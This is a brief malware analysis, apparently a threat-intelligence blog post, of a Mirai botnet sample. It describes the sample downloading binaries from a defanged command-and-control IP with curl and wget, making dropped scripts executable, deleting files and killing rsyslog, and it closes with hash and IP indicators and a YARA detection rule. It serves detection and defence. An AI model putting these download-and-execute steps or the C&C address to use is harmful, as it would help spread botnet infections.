Chmod +x command is launched to give execution permission to the sh script 96c97823d643992baf752da7799b4d10634b3c7521371c0d80194157f.sh in the folder /tmp/, configuration data, services and logs. Busybox utility box is used by Mirai botnet threats to exploit vulnerabilities and spread Mirai infections.
Here we can see the download of the malicious binaries from the C&C IP Address 151.242.30[.]13 by the main artifact with curl -O command:
The IP address in question has been registered by Internet Magnate (Pty) Ltd in Turkey. The opened ports and services are 21/FTP, 22/SSH, 80/HTTP, 9999/HTTP, 12121.
For the FTP protocol the tool vsFTPd Project vsFTPd 3.0.5 is used, for the SSH protocol OpenSSH 9.6p1 and Apache HTTPD 2.4.58 for HTTP protocol.
After launching the curl commands for the binaries that are on the C&C address the malware removes the binaries with "rm -rf" commands and it actually downloads the second stage artifacts with wget commands and the rsyslog service is killed.
We can see also other chmod +x commands for a lot of jpg images, busybox toolbox is copied in /tmp/ folder.
The dropped .sh script /tmp/e5898b9899e6679a69015cf0ae104dcb.sh is also launched and the downloaded binaries threats are run:
We have also some logs of the malware that keeps tracks of threats dropping and scripts threats launching:
The C&C IP address has a lot of potential opened vulnerabilities of Apache HTTP, for example CVE-2025-58098 and CVE-2025-59775.
IOCs:
- b27713a96c97823d643992baf752da7799b4d10634b3c7521371c0d80194157f
- 2cef31d0bc48a7c98dfc582b26ff6aad459ab3c5
- 3ed5a763ac666131083720f37fa14b32
- 151.242.30[.]13
YARA rule:
rule Mirai_20260103_CnC {
meta:
description = "Detects Mirai botnet with C&C information of a sample first seen on 3rd January 2026"
condition:
vt.net.url.raw icontains "151.242.30[.]13"
}
Sources of the OSINT screenshots: VirusTotal, AbuseIPDB, Censys, Shodan